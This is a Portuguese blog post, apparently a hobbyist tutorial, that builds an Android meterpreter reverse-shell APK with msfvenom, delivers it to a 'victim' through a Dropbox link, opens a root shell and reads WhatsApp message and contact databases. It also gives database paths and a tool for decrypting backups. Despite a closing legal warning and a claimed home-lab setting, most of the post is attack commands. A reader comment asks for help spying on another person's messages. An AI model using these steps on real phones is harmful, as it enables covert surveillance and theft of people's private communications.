INVADINDO ANDROID COM METASPLOIT – O RETORNO

O Metasploit é uma ferramenta usada para investigar vulnerabilidades em plataformas, servidores e em sistemas operacionais, com ele é possível realizar testes de invasão (pentests) criando um ambiente de exploração de vulnerabilidades. Quando uma vulnerabilidade é descoberta pode-se desenvolver um exploit, aplicando técnicas de engenharia reversa ou programação. O exploit é executado e testado em vários cenários, provando a existência de vulnerabilidades.

Criando Payloads Metasploit

Eu diria que um dos recursos mais úteis do Metasploit é o módulo msfpayload. Várias cargas (payloads) úteis podem ser criadas com este módulo, que também nos permite um shell em quase todas as situações. Para cada um desses payloads, você pode entrar no msfconsole e selecionar exploit/multi/handler. Executei ‘set payload‘ para configurar as opções necessárias (LHOST, LPORT, etc.). Executei e esperei que a carga útil fosse executada. Para o exemplo abaixo, que é bastante autoexplicativo, LHOST deve ser preenchido com seu endereço IP (LAN IP se atacar dentro da rede, WAN IP se atacar através da internet) e LPORT deve ser a porta na qual você deseja estar conectado.

Listando payloads

msfvenom -l

msfvenom-l

Neste post usei o android/meterpreter/reverse_tcp:

ifconfig

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.25.20 R> /root/wam.apk

d2j-apk-sign /root/wam.apk

msfconsole

shell

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.25.20

exploit

wam01

wam02

Fiz upload do aplicativo (wam-signed.apk) para o Dropbox.

Em seguida, enviei o link para a vítima. Deixei a vítima instalar e uma sessão foi iniciada.

wam03.jpg

help meterpreter

wam04.jpg

Navegando no Dispositivo

shell

wam05

ACESSO ROOT

su

wam06

Navegando nas Medias do Whatsapp

wam07

Naveguei no banco de dados do Whatsapp

wam08

Nos aparelhos Android os arquivos de mensagens do Whatsapp estão localizados na memória do aparelho ou no cartão de memória. Na memória do aparelho o arquivo de mensagens, msg.db e o arquivo contendo a lista de contatos, wa.db, ficam na pasta /data/data/com.whataapp/databases, e o acesso a eles só é possível se o aparelho estiver no modo root, isto é um motivo para não “rootear” o seu android. No caso em que o aparelho esteja configurado para armazenar mensagens no cartão de memória, os mesmos serão criptografados na pasta /sdcard/WhatsApp/Databases com o nome msgstore-yyyy-mm-dd.X.db.crypt, ou seja, criptografado; existem vários algoritmos usados na criptografia, como crypt, crypt5, crypt6, crypt7, crypt8, crypt12… Para decriptografar este banco de dados, no sistema operacional Windows, é só fazer download do “whatsapp-viewer” no github, pelo link https://github.com/andreas-mausch/whatsapp-viewer/releases/tag/v1.9 Abrir o aplicativo e no menu Arquivo e escolher o método de decriptografia

Wa_viewer

Resumindo: o banco de dados do Whatsapp versão de Android consiste em dois arquivos principais: wa.db contém todas as informações relacionadas aos contatos (id, número de telefone, status, etc.), enquanto que msgstore.db armazena as mensagens, incluindo anexos.

Estrutura do WhatsApp:

Assim como vários aplicativos o fazem, o WhatsApp armazena todas as suas informações em um banco de dados SQLite: a localização e a estrutura do banco de dados são diferentes de plataforma em plataforma. Vejamos no Andoid:

Backup Diário do Banco de Dados/Media: /Storage/(emulated/0, sdcard0)/WhatsApp/

Cache: /Storage/(emulated/0, sdcard0)/Android/Data/com.whatsapp/cache/

Dalvik cache: /data/dalvik-cache/data@app@com.whatsapp-2.apk.classes.dex

Sistema de Arquivos: /data/app/com.whatsapp-2.apk

Arquivos Data: /data/data/com.whatsapp/

Extração dos arquivos do Whatsapp com acesso físico

A extração dos arquivos com acesso físico pode ser feita de diversas maneiras:

  1. Conectando o aparelho a um PC;
  2. Transportando o cartão de memória para um leitor de cartões;
  3. Utilizando um gerenciador de arquivos no próprio dispositivo.

Após recuperar os arquivos é preciso copiá-los para um PC para poder recuperá-los.

Se o dispositivo for enraizado (root), você alcançará facilmente os bancos de dados simples (/data/data/com.whatsapp/databases/msgstore.db e wa.db).

Extração dos arquivos do Whatsapp com acesso remoto

Em um post anterior COMO HACKEAR O WHATSAPP DE ALGUÉM eu exemplifico o método “MAC Spoofing” (mudança do endereço Mac do telefone celular da vítima), o que exige acesso físico ao celular da vítima.

Sem ter o acesso físico ao aparelho da vítima o acesso é possível como mostrei no meu post anterior  COMO HACKEAR O ANDROID USANDO METASPLOITS. As ferramentas são as mesmas.

BLOG ASSIM MESMO

Vou postar assim mesmo!!!

Este post necessita de uma revisão – vou arrumar tempo para fazê-la – até que ficou um pouco grande, redundante e repetitivo; mas o objetivo é expor o perigo que um usuário, inocentemente, baixa e instala aplicativos oferecidos como atualização ao navegar por certos sites ou indicados por alguns youtubers como “um aplicativo sensacional! ”

Ademais, as fontes desses estudos são na língua inglesa, vejamos por exemplo: metasploits, exploit…. já me peguei escrevendo metaesploit. Coisa de doido!

ATENÇÃO!!! NÃO INVADA A PRIVACIDADE DE NINGUÉM SEM PERMISSÃO, ISSO É UM CRIME PASSÍVEL DE CADEIA. A EXPERIÊNCIA EXPOSTA AQUI FOI EXECUTADA EM MEU PEQUENO E POBRE LABORATÓRIO CASEIRO.

Anúncios

2 comentários

  1. Como executar esses passos do metasploit? Tô perdido,vc poderia me auxiliar? Preciso muito checar umas msg no ZAP de outra pessoa…gostaria de me certificar de uma situação que tá tirando meu sono e já está me deixando desesperado…

    Curtir

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair /  Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair /  Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair /  Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair /  Alterar )

Conectando a %s